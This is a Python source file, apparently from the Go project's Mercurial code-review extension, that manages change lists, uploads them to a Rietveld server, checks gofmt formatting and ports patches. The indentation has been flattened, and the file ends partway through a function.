emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + getremote(ui, repo, {}).path))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = getremote(ui, repo, {}).path
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
set_status("loaded CL " + name)
return cl, ''
global_status = None
def set_status(s):
# print >>sys.stderr, "\t", time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Get effective change nodes taking into account applied MQ patches
def effective_revpair(repo):
try:
return scmutil.revpair(repo, ['qparent'])
except:
return scmutil.revpair(repo, None)
# Return list of changed files in repository that match pats.
# Warn about patterns that did not match.
def matchpats(ui, repo, pats, opts):
matcher = scmutil.match(repo, pats, opts)
node1, node2 = effective_revpair(repo)
modified, added, removed, deleted, unknown, ignored, clean = repo.status(node1, node2, matcher, ignored=True, clean=True, unknown=True)
return (modified, added, removed, deleted, unknown, ignored, clean)
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, opts, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
redo = False
for f in unknown:
promptadd(ui, repo, f)
redo = True
for f in deleted:
promptremove(ui, repo, f)
redo = True
if redo:
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
for f in modified + added + removed:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not modified and not added and not removed:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
modified, added, removed = matchpats(ui, repo, pats, opts)[:3]
l = modified + added + removed
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
modified, added = matchpats(ui, repo, pats, opts)[:2]
l = modified + added
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
return ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
def getremote(ui, repo, opts):
# save $http_proxy; creating the HTTP repo object will
# delete it in an attempt to "help"
proxy = os.environ.get('http_proxy')
source = hg.parseurl(ui.expandpath("default"), None)[0]
try:
remoteui = hg.remoteui # hg 1.6
except:
remoteui = cmdutil.remoteui
other = hg.repository(remoteui(repo, opts), source)
if proxy is not None:
os.environ['http_proxy'] = proxy
return other
def Incoming(ui, repo, opts):
_, incoming, _ = findcommonincoming(repo, getremote(ui, repo, opts))
return incoming
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, pats, {})
files = []
for f in clx.files:
if f in modified or f in added or f in removed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if not GoodCLName(clname):
raise util.Abort("invalid CL name " + clname)
cl, err = LoadCL(repo.ui, repo, clname, web=False)
if err != '':
raise util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
# work-around for http://selenic.com/hg/rev/785bbc8634f8
if hgversion >= '1.9' and not hasattr(repo, 'match'):
repo = repo[None]
return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = [f for f in files if (f.startswith('src/') or f.startswith('test/bench/')) and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
#######################################################################
# Mercurial commands
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if missing_codereview:
return missing_codereview
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
if repo[None].branch() != "default":
return "cannot run hg change outside default branch"
name = "new"
cl = CL("new")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.copied_from:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if missing_codereview:
return missing_codereview
MySend(None)
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
return "cannot run hg clpatch outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
return "cannot run hg undo outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
return "no active release branches"
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise util.Abort("uncommitted local changes - cannot switch branches")
err = hg.clean(repo, releaseBranch)
if err:
return err
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise util.Abort(err)
except Exception, e:
hg.clean(repo, "default")
raise e
return None
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if missing_codereview:
return missing_codereview
if mode == "undo" or mode == "backport":
if hgversion < '1.4':
# Don't have cmdutil.match (see implementation of sync command).
return "hg is too old to run hg %s - update to 1.4 or newer" % mode
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
found = False
matchfn = scmutil.match(repo, [], {'rev': None})
def prep(ctx, fns):
pass
for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
rev = repo[ctx.rev()]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgpatch_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgpatch"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgpatch: " + ExceptionDetail()
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgpatch_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [], opts)
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
